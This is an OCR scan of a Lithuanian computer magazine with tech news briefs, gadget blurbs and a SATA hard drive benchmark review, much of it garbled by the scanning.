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KAI KITI KOMPIUTERIŲ GAMINTOJAI 
GARANTIJĄ MAŽINA - 1CG DIDINA 


VISIEMS !CG STACIONARIEMS 
KOMPIUTERIAMS 


Gerai būti nykštuku. Kodėl? Tau nereikia sekti nau 


įenų kompiuterinėse erdvėse, nes tau visai nerikoin- 
gas kių ilgai laukiamas 30 colių įstrižainės monitorius 
visai pakanka I „penkioiinio“. Kodėl dar? Kom 


piuterio dėžė gali tapti antrais namais, Kuriuose tu 
įsisuksi savo lizdų nepomirši karikartėmis 
nuvalyti storu dulkių sluoksniu padengtu mikroschemų 
bei kompiuterio elementų. Jeigu tu esi mažos nykšiu 
ai Klaviatūrą gali moigyti ne rankomis, o pėdo- 

ii nepatogu, tačiau teikia ne mažiau malo 
e kompiuleriniai kilimėliai, ant kuriu turi 
ioios programas sukurtą šokį. Ir pelė 
tampo tokiu mielu pad ją gali naudoti kaip 
roges vaikystė li ir kojų galais įsibė, 
čiuoži į prieki. Smagu būti nykštuku — pa 
kompiuteriai jam kaip kosininė stotis mums, 


tent nykštukai?! 


Čiams. Ir išvis, 


„keistų“ failų iš interneto. Būtent virusai ir paverčia 
Žmones nykštukais. 


"BIBŽIOJI PRENUMERATOS AKCIJA BAIGĖSI! 


Apple IPod Nano laimėjo Linas Markevičius iš 

Vilniaus. 

Altec Lansing kolonėles laimėjo Raimundas 

Leščinskas iš Palangos raj. 

Samsung Digimax A50 laimėjo Viktoras 

Puronas iš Vilniaus. 

AverMedia TV+FM imtuvą laimėjo Darius 

Abramavičius iš Marijampolės. 

Kingston SD/MMC kortelių skaitytuvus laimėjo 
| Jonas Dulinskas iš Kauno, Egidijus Muralis iš 

Jonavos ir Paulius Balčiūnas iš Šiaulių raj. 
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ĮSIUTUSI SESILIJA PRIEŠ „YAHOO“ 


Gyveno kartą Sesilija Beirns. Gyveno ji ne viena, o su savo drau: 
gu Rendolfu. Kaip dažnai nutinka, ilgainiui jie vienas kitam atsi- 
po ko prasidėjo ginčiai bei skandalai. Vieną gražią dieną 
Sesilija pareiškė: „Impotentas! 
Man reikia tikro vyro, eržilo. Eik 
lauk, niekam ti šikniau!“. Re: 
dalfas išėjo, tačiau istorija tuo ne- 
sibaigė. „Impotentas“ pasirodė be- 
sąs kerštingas, todėl norėdamas 
savo buvusiai draugei pridaryti ne- 
malonumų, užėjo į Yahoo kompa- 
nijos pažinčių svetainę, ten užre- 
gistravo anketą ir prie jos prikabi- 
no apsinuoginusios Sesilijos nuo- 
traukas. Kontaktuose Rendolfas 
nurodė jos darbo telefoną, mob 
lųji ir elektroninio pašto adresą. 
Kadangi gamta Sesilijai nepagai- 
lėjo dailių formų, jau kitą dieną 
„draugiškai pabendrauti“, ir kasdien jų buvo 
no susisiekti su svetainės admi- 
au ten jos skundai buvo tiesiog 
noruojami. Tada ji padavė Yahoo | teismą. „Trys milijonai dole- 
rių, ir mano psichologinė trauma užgis“, — sušuko ponia. Kol 
kiek Sesilijai atiteks pinigų. Tačiau aš seksiu šios 
kuo ji pasibaigė. 


pr 


[| ylė siūlymai 
vis daugiau. Moteris pamė; 
acija ir išimti anketą, t 


kas neaišku, 
storijos tęsinį ir papasakosiu, 


PARSISIUNTEI „MP3“2 
MOKĖK BAUDĄ 


Čikagoje baigėsi Sesilijos Gonzales teismas, kur ji buvo kalti- 
nama neteisėtų muzikos siuntimusi iš interneto. Poniutės kom- 
piuteryje buvo saugoma apie tūkstantį mp3 formato kūrinių 
„Na ir kas? paklausi tu. „O tas, kad dabar sumokėk 22,5 
tūkstančius dolerių!“ — toks buvo teismo nuosprendis. Šiai 
poniai dar pasisekė, kad ją padavusios į teismą garso įrašų 
kompanijos RIAA ieškinys minėjo tik 30 dainų. Baudos suma 
gauta už kiekvieną iš šių kūrinių priskaičiavus po 750 dolerių. 
Šiaip jau RIAA senai buvo nusižiūrėjusi ponią Gonzales, kuriai 
dar anksčiau buvo siūloma sumokėti 3500 dolerių ir taip 


užglaistyti incidentą. Poniai Gonzales atsisakius, byla pasie- 
kė teismą. Ekspertai mano, jog ši byla taps posūkiu kovojant 
su autorinių teisių pažeidė- 
jais, kadangi tokios bausmės 


Liunaiikiiuitniiai už paprastą dainų siuntimą- 


si dar niekas nebuvo gavę: 
O eiliniai interneto vartotojai 
mano, kad RIMA važiuoja sto- 

Naudodamasis proga, 
noriu prisipažinti, kad mano 
kolekcijoje daugiau nei 40 
tūkstančių mp3'ioškių, 0 
mano kaimynas jų turi dar 
daugiau. Ir RIAA gali pabučiuo- 
ti mums į užpakalius :). 
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NAUJOVIŠKAS SPIDOMETRAS 


Seniai aišku, jog didžioji dauguma automobilių avarijų įvyksta 
dėl kelių eismo taisyklių pažeidimo, iš kurių daugiausiai — 
dėl greičio viršijimo (apie 259) avarijų). Tik kaip gi tuo 
įtikinti pačius vairuotojus? Visokie profilaktiniai aiškinamieji 
renginiai nieko gero neduoda, o baudos nusėda pačių kelių 
patrulių kišenėse. Vis dėlto Kanados valdžia parinko tinka- 


mą receptą. Nuo šiol su tokiais pažeidėjais bus kovojama 
pačiomis radikaliausiomis priemonėmis. Ne, be jokios abe- 
Jonės, greito važiavimo mėgėjai nebus sodinami į el 

kėdę, tiesiog planuojama visose (pagal galimybes) mašino- 
se sumontuoti specialius greičio ribotuvus. Dabar visus ban- 


dymus pasiekti pirmą kosminį greitį ribos pats automobilis: 
ir koks greitis bus leidžiamas, bus 
r 2 TI nustatoma su įmontuotu GP: 
a ė moduliu, kuris galės sutikrinti bo- 
dis 

= je, kur parodė puikius rezultatus. 
Tiesa, tokį įrenginį daugelis vairuotojų greičiausiai pasitiks 
atvirai pasipiktinę, ir kol kas dar neaišku, kaip visus priversti 


lido buvimo vietą su leidžiamų 
juos įdiegti. 


artėjant prie apriboto greičio zonos, akseleratoriaus pedalas 
vis smarkiau priešinsis spaudimui. Informacija apie tai, kur 
greičių žemėlapiu. Ši sistema jau 
išbandyta Šiaurės Amerikoje, Šve- 
dijoje, Nyderlanduose ir Britanijo- 
LABORATORIJA, KURI APJUNGĖ 
“ “ 
„GOOGLE“ IR „MICROSOFT 
Kas galėjo pagalvoti, kad po daugybės rietenų be n 
kinimųsi tarp Google ir Microsoft, šio 
bendradarbiauti. Prie jų prisijungė ir Sun Microsystems, kuri iap 
pat kovoja su Microsoft, tačiau palaiko šiltus santy 3 
le. Priešiškas puses apjungusiu projektu tapo RAD (atspa 


trikimams adaptyios paskirstytosios sistemos) tyrimu la oratori- 
ja, įkurta Kalifomijos Berklio universitete. Trys IT gigantai į ją in 
vestavo po 7,5 milijonus bei pasižadėjo kasmet išskirti dar po 


1,5 milijono iš kiekvienos kompanijos. Laboratorijos tikslas 


ni tinklinę programinę įrang; 
45 SUN 


suku 


kuri padėtų paleisti stambiu 
eBay.com ir Amazon.com tipo Ir 
temnetinius portalus. Kol kas labo- 
ratorijoje dirba 16 žmonių, tarp ku- 


mMicrosy rių yra profesorių ir talentingų Ber- 

We make the net work. klio universiteto absolventų, jiems 
vadovauti paskirtas profesorius Dei 

4, vidas Patersonas. Be abejo, po 

2 naujienos apie pradėtą bendradar- 


biavimą pasklido g. jog karui 


- tarp IT industrijos monstrų atėjo 
Microsoft las. Tačiau vadovaujantysis „Micr 

soft“ tyrinėtojas Džeimsas Larusas 

paneigė juos pareiškęs, jog susita- 


rimas buvo sudarytas ne vardan tai- 
kos, o tik todėl, kad visoms trims 
pusėms jis atneš naudos. 


Got gle 
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NAUJASIS HUMANOIDAS 


Kompanija „Honda“ pade- 
monstravo naują savo žymiojo 
roboto ASIMO versiją, kuris 
pastaruoju metu tapo viena 
iš pagrindinių firmos vizitinių 
kortelių. Esminių naujovių 
naujai išleistame modelyje 
ne tiek jau daug. Nuo šiol 
| ASIMO gali vaikščioti praktiš- 
kai paprasto žmogaus ėjimo 
greičiu (maždaug 6 km/h). o 
eidamas gali laikyti žmogų už 
rankos. Taip pat robotas bu- 
vo išmokytas atlikti įvairius 
nesudėtingus biuro darbus: 
Jis gali nešioti kai kuriuos daik- 
tus (pavyzdžiui, karštą kavą), be to, perdavinėti nurodytą infor- 
maciją. Naujasis ASIMO jau pardavinėjamas, o gamintojai tiki- 
si, Jog atsiras nemažai pirkėjų, kurie vietoje sekretorių pagei- 
daus įdarbinti tikrą robotą. Tiksli roboto kaina kol kas neatsklei- 
džiama, tačiau man viduje kažkas kužda, kad už tuos pačius 
pinigus bus galima nusisamdyti visą ilzakojų sekretorių būrį, be 
to, aš labai abejoju, kad jos bus mažiau efektyvios. 
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PADOVANOK „PHILIPS“ 


Šventės jau senai praėjo. Ar tu visiems padovanojai dovanų? 
Jeigu taip, tai labai gerai. Na, o jeigu ką nors pamiršai, tai 
gal tas kažkas buvo išvažiavęs? Beje, ar savęs nepamiršai? 
Jeigu taip netyčia nutiko, šią klaidą tu gali labai lengvai ištai- 
kompanija „Philips“ išleido naują įrašantį DVD įrenginį 
DVDR 3330 H, kuris bet kam galėtų būti puiki dovana. Pa- 
kanka jį prijungti prie televizoriaus, ir tu pamirši daugelį pro- 
blemų: dabar nesvarbu, ar tu namie, ar ne, planuojamas 
įrašymas neleis praleisti mėgstamo filmo ar laidos. Su įrašy: 
I susijusios ir kitos galimybės: laidos pradžios peržiūra (kol 
pabaiga dar rašoma), automatinis įrašymas pagal grafiką, 
patikusių scenų atkūrimas įrašymo metu ir taip toliau. i.Link 
sąsaja leidžia vaizdą rašyti ir iš skaitmeninės vaizdo kame- 
ros. Tiesa, į ką visa tai įrašinėjama? Atsakymas paprastas ir 
malonus į įmontuotą 160 Gb kietąjį diską! Taigi vietos 
užteks visiems. Tačiau tai ne tik įrašymo įrenginys, bet ir gro- 
tuvas, kuris atpažįsta daugybę formatų: DVD, DVD+R/RW, 
DVD-R/RW, (S)VCD, JPEG,CD,CD-R/RW ir MP3-CD. Malo: 
naus žiūrėjimo! 
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ANTIHAKERIŠKA MIKROSCHEMA 


wykusiame susitikime su spaudos atstovais ir kompiu- 
“ korporacija pasidalino informacija api 


Nesene 
teriniu jaunimu „Int 


savo būsimus projektus. Ko gero, pati įdomiausia ir perspekty 
naujoji mikros: 


viausi diegta motininėje plokštėje ir 
kinių kirminų veikia paleistas progre 

kitam užkrėtimui skirtus savo modulius. saugumo mikro- 
schema greitai aptiks tokį įsikišimą ir perduos pavojau: 

po ko adminas galės kompiuterį išjungti iš tinklo arba ieš 
vaistukų. Galima padaryti taip, kad pasirodžius pa 

nalams visa tai būtų daroma au! ai. Kadangi toli grai 
ne visi vartotojai savo kompiuteriuose įdiegia antivirusus ir nuo 
šnipinėjimo saugančią programinę įrangą, mikroschemm 


AK komplei taciją ža 
da padidinti drą 
kompiuterių saugu- 


jų kom 
btenduoj 


tačiau mano 
mikroschema puikiai 
papildys ki psau- 
g0s programas. 


NETIESIOGINIAI ĮRODYMAI 


Hakerių užpuolimai ant 
svarbiu Amerikos vyriausy- 
bės tinklo resursų t 
si, 0 pastaruoju metu jie 
dar ir padažnėjo. Kas už 
jų stovi? Kevinas Mitni 
kas? Osama bin Ladenas? 
Ne!“ — atmeta pagrindi 
nius įtariamuosius FTB di 
rektoriaus pavaduotojas 
Luisas Reigelis. „Tai kitų 
šalių vyriausybės!“. Be 
abejo, ne tik vyriausybės 
gali būti suinteresuotos pirmaujančių amerikiečių mokslinin- 
kų tyrimais, tačiau tik vyriausybės turi galimybes inicijuoti ko- 
kybiškus apsaugotų sistemų nulaužimus. „Šaliai kur kas pi- 
gjau suorganizuoti informacijos vagystę per internetą ir po to 
ją panaudoti technologijos plėtojimui. O JAV tokiems daly- 
kams sukurti sugaišo dešimtmečiu paaiškino Reigelis 
Mes neturime įkalčių, tačiau šį bei tą įtariame, o tai jau 
nemažai!“ reziumavo jis. Sprendžiant iš visko, FTB ne- 
skaito naujienu, nes priešingu atveju ji žinotų, kad NASA ty- 
rimų tinkluose vei dešimtys nepilnamečių skriptvaikių, ku- 
rie norėdami parinkti reikiamą eksploitą nė neketina kreiptis 
į vyriausybę pagalbos. Žodžiu, neramūs šiandienos laikai. O 
jeigu rytoj JAV nuspręs, kad tai Rusijos vyriausybė kapstosi 
Pentagono kompiuteriuose? Žodis po žodžio, ir taip kils Tre- 
čiasis pasaulinis karas. 
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ČILĖS HAKERIAI PASKELBĖ 
KARĄ PERU HAKERIAMS 


Jeigu tu kartais pažiūri CNN, tai turėtum žinoti, kad tarp Čilės Ir 
Peru dabar subrendo rimtas konfliktas. Čilė valdo 38 tūkstan- 
čius kvadratinių kilometrų nuostabių žuvingų vandenų. o kaimy- 
ninė Peru ketina juos pasisavinti. Žodžiu, šios dvi valstybės ne- 
paliauja ginčytis dėl savo teritorijų, tačiau kėsintis į žuvingus 
vandenis to jau per daug. Paskutiniu lašu tapo nesėkmingi 
bandymai pasidalinti populiaraus vietinio alkoholinio gėrimo „pis- 
co“ autorystę. Kol savo šalis atstovaujantys politikai vieni ki- 
tiems rauna plaukus, Peru hakeriai nusprendė ne juokais kibti į 
darbą. Jie ėmėsi laužti vyriausybines svetaines, palikinėdami 
ten maždaug tokio us lozungus: „Atiduokite mūsų žuvį! Ša: 
lin rankas nuo piskos!“, Bet ir Čilėje gyvena ne vien tik ferme- 
riai. Neilgai galvoje, Čilės hakeriai nulaužė Peru vyriausybės sve- 
tainę, kurioje paliko tokią žinutę: „Neatiduosime savo žuvies! Ir 
mūsų piskos nelieskit!“. Štai tokios aistros verda Čilės ir Peru 
platybėse. Kuo visa tai baigsis — kol kas neaišku. 
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„PRESTIGIO“ PRESTIŽAS 


Kompanijos „Prestigio“ darbui kelyje skirtų ir nedidelių gabaritų 
bei svorio nešiojamųjų kompiuterių šeimyna pasipildė nauju mo- 
deliu. Tai Visconte 1450W, plonas ir stilingas mobilusis AK, pa- 
laikantis geras galimybes, labai našus ir turintis daugybę įdo- 
mių funkcijų. Jis kainuoja šiek tiek per tūkstantį dolerių. Patei- 
kiamos dvi pagrindinės mobiliojo AK modifikacijos: su proceso- 
riumi Intel Pentium M 7xx (1.60-2.0 GHz, 533 MHz FSB, 2 Mb 
L2) arba su procesoriumi Intel Celeron M 3xx (1.30 GHz ir aukš- 
čiau, 400 MHz FSB, 512 Kb/1 Mb, 90 nm), turi iki 2 Gb atmin- 
ties. Pentium M modeliai sukurti antros kartos Centrino pagrin- 
du, todėl jie jau turi Wi-Fi adapterį ir 8 kanalų garso kodeką. Be 


to, visi modeliai turi plačiaformatį 14 colių ekraną ir įmontuotą 
web kamerą. Tiesa, tai labiau skirta pramogoms, o rimti pilie- 
čiai įvertins įmontuota Bluetooth adapterį. atminties kortelių 


skaitytuvą, dideli lizdų rinkinį ir pažadėtas 4,5 autonominio dar- 
bo valandas. Ir nepamirškite stilingos išvaizdos! 
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PILNAVERTIS „SAMSUNG USB“ 


Dabar rinkoje parduodama tiek flash 

grotuvų, kad tik labai tingus gamin- 

tojas savo arsenale dar neturi tokio 

įrenginio. Savaime suprantama, jog 

esant tokiai pasiūlai įprastu įrengi- 

niu jau nieko nebenustebinsi, todėl 

gamintojai į savo produktus pride- 

da mažų, bet labai įdomių, naudin- 

gu ir patogių galimybių. Toks įrengi- 

nysyra mp3 flash grotuvas Samsung 

YP-U1, kuris turi pilnavertį įmontuotą USB lizdą, kas leidžia 
jam apseiti be nepatogių prailginimo laidų. Tiesiog jį įjungi į 
kompiuterio USB lizdą, ir viskas siųskis muziką. Štai Ko- 
kios šio grotuvo galimybės. Kitose srityse jis taip pat neblo- 
gas: atpažįsta MP3, 0GG, ASF ir WMA formatus, SRS WOW 
3D garso sistemą. Parduodamų modelių talpa svyruoja nuo 
256 Mb iki 1 Gb, kurie gamintojų tvirtinimu vien tik su aku- 
muliatoriaus energija gali dirbti iki 13 valandų. Įrenginio ga- 
baritai: 23,8x87,8x13,5 mm; svoris: 30 g. 


STALINĖ RAKETŲ 
PALEIDIMO SISTEMA 


Žinoma internetinė 
parduotuvė „Marks 
8 Spencer“ savo pir- 
kėjams pasiūlė gana 
originalų USB įrengi- 
nį, kuris galėtų tapti 
nebloga dovana. Šis 
žaisliukas iš tiesų yra 
miniatiūrinė raketų 
paleidimo sistema, 
kurioje vietoje svie- 
dinių naudojami sti- 
lizuotos rakė for- 
mos strypeliai. Jeigu 
į kompiuterį įdiegsi 
komplekte pateikia- 
mą programinę įran- 
ga, tai šią artileriją 
bus galima pilnai 
valdyti tiesiog monitoriaus ekrane. Norėdama nusitaiky 
tema gali pasisukti aplink savo ašį ir pakeisti atakos kampą. 
Be abejo, pataikymo tikslumas pasiekiamas ne iš karto, ta- 
čiau po kelių treniruočių bus galima strypelį praktiškai bet 
kokiu atstumu ti tiesiai į užsižiopsojusio boso kaktą. 
Jeigu įkalbintumei savo kolegas taip pat nusipirkti šį įrenginį, 
tai biurą būtų galima tuojau pat paversti tikra karo veiksmų 
zona. Deja, kartu su sistema pateikiami tik trys strypeliai 
raketos, kurie tikrai greitai pasimes. Tačiau vietoje jų bus 
galima naudoti, pavyzdžiui, aštriai nudrožtus pi 
kurių dar papildomai reiktų pritvirtinti nedid 
tu svajoji apie tokį įrenginį, tai būk pasiruošę: 
tos nurašyti 35 dolerius. 


iš savo sąskai- 
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LOGITECH CORDLESS 
DESKTOP COMFORT 


Daugelis stacionarių kompiuterių 
vartotojų neįsivaizduoja paties 
kompiuterio be klaviatūros, todėl 
nenuostabu, jog šis elementas 
maigomas, čiupinėjamas ir kartais 
net trankomas dažniausiai. Tačiau 
yra ir dar vienas dalykas — pripra- 
timas. Kartais žmonės pripranta 
prie įmantrių klaviatūrų ir nė ne- 
įsivaizduoja efektyvaus darbo su 
paprastomis mygtukų dėžutėmis 
Stai jums viena tokių imantrių kla- 
viatūrų — Logitech Cordless Desk- 
top Comfort. Kaip teigia gaminto- 
Jai, Ji sukurta norint pasiekti aukš- 
čiausius rezultatus dirbant bei žai- 
džiant kompiuterinius žaidimus. 
Jau nekalbant apie komunikaciją 
su kitais interneto vartotojais. Tur- 
būt esminis šios klaviatūros bruo- 
žas — dvi klavišų sekcijos, kurios 
atskirtos viena nuo kitos tuščiu tar- 
pu. Patys klavišai pritaikyti taip, kad būtų kuo patogiau spaus- 
dinti abiem rankomis. Žinoma, tą patį siūlo ir visos kitos klavia: 
tūros, tačiau kai dešinės rankos pirštai lenda po kairiosios pirš- 
tais, patogumo kaip ir nebelieka. Klaviatūrai kompaniją palaiko 
ir aukštos kokybės belaidė optinė pelė MouseMan. Belaidė tech- 
nologija leidžia tiek klaviatūrą, tiek pelę laikyti bet kurioje darbo 
stalo vietoje, o tai išties didelis žingsnis patogumo link. Optinė 
pelė „juda“ praktiškai ant bet kokio paviršiaus ir „nepadovano- 
ja“ jokių kursoriaus trūkčiojimų ekrane. Elektroninis paštas, pro- 
gramos, internetas ir bylos pasiekiami vieno mygtuko paspau- 
dimu tai taip pat ne tokia jau didelė naujiena, tačiau ši kla 
viatūra pasižymi ypatingai protingai išdėstytais „trumpaisiais“ kla- 
višais. 

Ar galima girti šią klaviatūrą? Turbūt taip, tačiau jūs patys turė- 
tumėte išbandyti „skeltą“ klaviatūrą vien dėl to, jog po to ne- 
reiktų keletą mėnesių bandyti „susidraugauti“ su ja. Tie, kam 
tai pavyko padaryti, skeltos klaviatūros nekeis į jokią kitą. Be to, 
kompanija „Logitech“ jau seniai puikuojasi pakankamai solidžia 
reputacija, todėl 5 metų garantija (kurią teikia gamintojas) tėra 
maža kruopelytė papildomos naudos tiems, kas ir taip negali 


HARDNEWS A 


NAUJAS VARDAS LIETUVOJE 


Gyvename skaitmeniniame amžiuje, todėl ne nuostabu, jog 
dažniausiai sutinkamos skaitmeninės informacijos apraiškos 
yra filmai, muzika, nuotraukos bei, žinoma, dokumentai. Ta- 
čiau juos reikia kaupti ne tik 
kompiuterio kietajame 
diske, bet ir atsarginė 
se kopijose, t.y. daž- 
niausiai kompaktiniuo- 
se diskuo 
Malonu, jog į Lietuvėlę 
„ateina“ naujas (bent 
jau Lietuvoje) kompak- 
tinių diskų vard. 
Kompanija „Intenso“ nuo 
pat jos įkūrimo užsibrėžė 
tapti lyderiaujančia tokios produi 
cijos gamintoja, todėl ir jos gaminamų produktų asortimentas 
išties žavus. Galbūt kas nors to nežino, jog „Intenso“ buvo pir- 
moji kompanija pasaulyje, sumasčiusi kompaktinius diskus par- 
davinėti ne vienetinėse dėžutėse, o taip vadinamuose „pyra- 
guose“ - taip, tai tie patys kūgiai (arba „cake'ai“), kuriuose su- 
mauta 25, 50, 100 ar net 150 kompaktinių diskų. Be to, esa- 
me dėkingi kompanijai „Intenso“ ir už daugelį kitų „išradimų“ 
popieriniai vokeliai diskams, plonytės dėžutės („slimcase“) ar 
netgi dvigubi dėklai. Ir kurgi buvo visos kitos kompanijos tuo 
metu? Ogi tiesiog stebėjo kylančią „Intenso“ žvaigždę ir kopijavo 
jos sumąstytus „išradimus“. Panašu, jog tai pagaliau baigiasi ir 
mes turėsime „originalius“ diskus iš rani kurios juos ir 
pavertė tokiais, kokius turime šiandien. 
Turbūt esi matęs juodus diskus — tai ypatingą saugumą propa 
guojanti laikmena. Nepatikėsi: „Intenso“ ir čia buvo viena pir 
mųjų. Ši kompanija viena pir- 
mųjų į savo gamyklas nuve 
žė receptus, kaip „kep- 
ti“ DVD diskus, kurių 
pavadinimas iššifruoja- 
mas taip: Digital Versa- 
tile Disc. Siuo metu 
kompanija „Intenso“ 
gamina visus įmano- 
mus CD ir DVD forma- 
tų diskus. Ir kol tu skai- 
tai šį aprašymą, „Inten- 
so“ inžinieriai pluša Ia- 
boratorijose — galbūt 
jie sukurs dar ką nors, 
kuo mes džiaugsimės 
keletą dešimtmečių?! 
Pavyzdžiui, kažką pana- 
šaus į šį aliuminį kibi- 
rėlį, kuriame telpa 150 
CD-R kompaktinių dis- 
kų. Tai daugiau nei 100 
GB talpos, kurią mums 
siūlo Vokietijos kompa- 
nija „Intenso“. 
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Kietojo draugo patikrinimas 
„Serial ATA“ kietųjų diskų testavimas 


NEPAISANT VERŽLIOS KITŲ Į KOMPLEKTĄ ĮEINANČIŲ DALIŲ EVOLIUCIJOS, DAR VISAI NESENAI BUVO 
SUNKU ĮSIVAIZDUOTI MOTININĘ PLOKŠTĘ BE MAŽIAUSIAI DVIEJŲ IDE (PARALLEL ATA) LIZDŲ. TAČIAU 
ATSIRADUS NAUJAM STANDARTUI „SATA 150“ (SERIAL ATA), SITUACIJA PRADĖJO GREITAI KEISTIS. 
PAVYZDŽIUI, Į „LGF775“ SISTEMINES PLOKŠTES DABAR JAU MONTUOJAMAS VISO LABO VIENAS 
„PATA“ KANALAS, ŠIAME STRAIPSNYJĘ MES NUSPRENDĖME IŠTESTUOTI KAI KURIUOS „SATA“ KAU- 
PIKLIŲ MODELIUS, KAD GALĖTUME IŠMATUOTI PAGRINDINES JŲ GREIČIO SAVYBES IR SULYGINTI 


JAS SU ŠIUOLAIKINIO „PATA“ KIETOJO DISKO SAVYBĖMIS.. 


[Technologijos] 

Jeigu sulygintume SATA ir PATA kaupiklius, tai į akis iš karto 
kristų jų išorės skirtumai. Vietoje drūto IDE šleifo SATA diskas 
prie kompiuterio jungiasi mažyčiu ir tvarkingu kabeliuku, kas 
yra labai gerai, kadangi sumažėjus kabelio gabaritams page- 
rėjo oro judėjimas korpuso viduje, supaprastėjo priėjimas prie 
kitų kompiuterio komplektuojančių dalių, o dėl to, kad SATA 
kabelyje mažiau gyslų, duomenų perdavimo greitis padidėjo 
iki 150 megabaitų per sekundę prieš 133 PATA per tokį pat 
laiką perduodamus megabaitus. Prie SATA kabelio gali būti 
prijungtas tik vienas diskas, todėl nebėra painiavos su kaupik- 
lio darbo režimu (master arba slave). Pasikeitė ir kaupiklių 
maitinimo būdas — vietoje įprastinio molex'o SATA diskuose 
yra nuosava jungtis. Pagrindinė SATA sąsajos naujovė — tai 


suderinamumas su hot swap, t.y. „karštas“ kietųjų diskų pri- 
jungimas. Tai labai naudinga naujovė, kadangi norint prijungti 
savo diską daugiau nereikia išjungti kompiuterio, tačiau čia 
iškyla nedidelė problema: ne visos motininės plokštės ir ne 
visi diskai supranta tokį „karštą“ prijungimą. Panašiai kaip ir 
SCSI kaupikliai, SATA įrenginiai jau suderinami su NCO tech. 
nologija. NCĘ — tai iš kompiuterio diskui perduodamų ko- 
mandų rūšiavimo technologija, sukurta siekiant maksimalaus 
našumo. Pavyzdžiui, jeigu į HDD perduodama komanda nu- 
skaityti duomenis iš 12, 3 ir 7 takelių, tai NCO padarys taip, 
kad magnetinių galvučių judėjimo maršrutas būtų optimalus. 
Tiesa, derėtų paminėti, kad panorėję ypatingi estetai gali SA- 
TA kaupiklį per specialų perėjimą prijungti prie PATA valdiklio. 


[Testavimo metodika] 

Testavimas buvo atliekamas su programomis HD Tach ir WinBench 99. Su HD Tach buvo matuojamos šios savybės: maksimalus 
nuoseklaus skaitymo greitis, vidutinis nuoseklaus skaitymo greitis, maksimalus nuoseklaus įrašymo greitis, vidutinis nuoseklaus 
įrašymo greitis, atsitiktinio priėjimo laikas (Random Access Time) ir maksimalus sąsajos greitis. Po to kietajame diske buvo 
sukuriama particija, lygi pilnai jo talpai, kuri buvo formatuojama su NTFS failų sistema. Tada buvo atliekamas Disk Transfer Rate 
testas (iš esmės tai taip pat nuoseklus skaitymas), įeinantis į paketo WinBench 99 sudėtį, buvo fiksuojamas pradinis ir galutinis 
greitis, be to, atliekama gauto grafiko analizė, jame neturėjo būti staigių „šuoliukų“ arba „kritimų“. Kiekvieno kaupiklio testavimo 
metu su programa HDD Temperature buvo nuolat stebima temperatūra bei fiksuojamas maksimalus jos parodymas. 

Siekiant palyginti SATA ir PATA kietųjų diskų su 7200 apsisukimų per minutę sukimosi greičiu spartos charakteristikas, prie 
testuojamų įrenginių buvo pridėtas PATA kaupiklis. 


Testinis stendas 

Procesorius: Intel Celeron D 3GHz 

Motininė plokštė: Intel D925XECV2, 

Operatyvinė atmintis: Kingston 256Mb DDR2 

Kietasis diskas: HDD Western Digital WD2000JB 200Gb 
Operacinė sistema: Windows XP Corporate Edition SP2 


Maxtor 6B300S0 


Talpa, Gb: 300 

Sąsaja: SATA 

Sukimosi greitis aps/min: 7200 
Spartinančiosios atminties talpa, Mb: 16 
Fizinių diskų kiekis: 4 

Galvučių kiekis: 8 

Gabaritai, mm: 147 x 26 x 102 

Masė, kg: 0,6 

Testavimo rezultatai: 

Nuoseklaus skaitymo greitis, MDS: 
Maksimalus: 66,2 

Vidutinis: 53,9 

Nuoseklaus įrašymo greitis, Mb/s: 
Maksimalus: 36,5 

Vidutinis: 26,8 

Random Access Time, ms: 14,1 
Maksimalus sąsajos greitis, Mb/ 
Disk Transfer Rate, Mb/s 
Pradinis greitis: 64400 


33,5 


Maksimali temperatūra, C: 50 


Tolygus skaitymo graikas, 
tačiau greičio charakteristikos Vidutinės 


Komplektacija smarkiai skiriasi nuo standartinės. Jeigu kiti kaupiklai į testavimą 
pakliuvo tik antisiatiniuose paketuose, tai čia mes turime simpatišką dėžutę, į kurią 
buvo supakuoti cu kaupikliai, kompaktinis diskas su programine įranga, SATA kabe: 
lis ir paketas su kaupiklio montavimui skirtomis priemonėmis. Šie kietieji diskai po 
Seagate 3400832A5 savo talpa yra antri. Taip pat į akis Iš karto krenta didelė 
įrenginio spartinančiosios atminties talpa (net 16 megabaitų), kas yra avigiubai 
daugiau, nei kitų testavimo dalyvių. Iš karto pasidaro aiški šių kaupiklių paraucoji- 
mo sritis: pavyzdžiui, jie kuo puikiausiai galėtų būti panaudojami nedideliame loka- 


laus tinklo failų servevyje, t. y. tokioms užduotims, kur svarbus kaupiklio spartinančio- 
sios atminties dydis. Aptarsime šių įrenginių testų rezultatus. Bendrai paėmus, 
rezultatai visai neblogi: šis kaupiklis tarp SATA kietųjų diskų užėmė užtikrintą trečiąją 
vietą, atsitiktinio priėjimo laiko teste antrąją vietą, 0 pagal maksimalaus są. 
greičio testo rezultatus Iš viso Užtikrintai laimėjo (čia greičiausiai pasireiškė didesnė 
nei kituose tzstuotuose įrenginiuose spartinančiosios atminties apimtis). Iš trūku: 
mų galima būtų paminėti aukštą ant disko užfiksuotą temperatūrą (antras rezulta- 
tas), beje, savo našumu šis diskas pastebimai atsiliko nuo testo laimėtojų. 


Talpa, Gb: 200 
Sąsaja: SATA 

Sukimosi greitis aps/min: 7200 
Spartinančiosios atminties talpa, Mb: 8 
Fizinių diskų Kiekis: 2 

Galvučių kiekis: 4 

Gabaritai, mm: 147 x 26 x 102 

Masė, kg: 0,6 


estavimo rezultatė 


Seagate 


Nuoseklaus skaitymo greitis, Mb/s: 
Maksimalus: 73,1 

Vidutinis: 61.1 

Nuoseklaus įrašymo greitis, Mb/s: 

Maksimalus: 70,9 

Vidutinis: 48,1 

Random Access Time, ms: 15,7 

Maksimalus sąsajos greiūs, Mb/S: 128,8 

Disk Transter Rate, MD/S 

Pradinis greiūs: 71100, 

Galutinis greitis: 40600 

Maksimali temperatūra, C: 49 

Geriausias greičio charakteristikų grafikas, 
Įspūdingas maksimalus ir vidutinis skaitymo greitis 


ST3200826AS 


Šis kaupiklis mus maloniai nustebino savo našumu. Diskas besąlygiškai nugalėjo nuosekiaus skaitymo 
greičio (tiek maksimalus, tiek ir nuoseklus greit 
o nuoseklaus įrašymo greičio teste pergalę pasidalino kartu su S13400832S. Deja, neapsieita be 
trūkumų. Dėl aukšto įrašymo į diską tankio kaupiklis atsitiktinio priėjimo laiko teste parodė prastus rezulta- 
tus (trečias iš keturių) — tai Seagate kietiesiems diskams būdinga problema. Be to, kaupiklis gana 
triukšmingas, ypač magnetinių galvučių pozici 


J, Disk Transfer Rate (pradinis ir galutinis greičiai) testuose, 


navimo operacijose. Taip pat čia galime pridėti tipišką per 


aukštos temperatūros problemą — net keturiasdešimt devyni laipsniai. 


Taipa, Gb: 400 

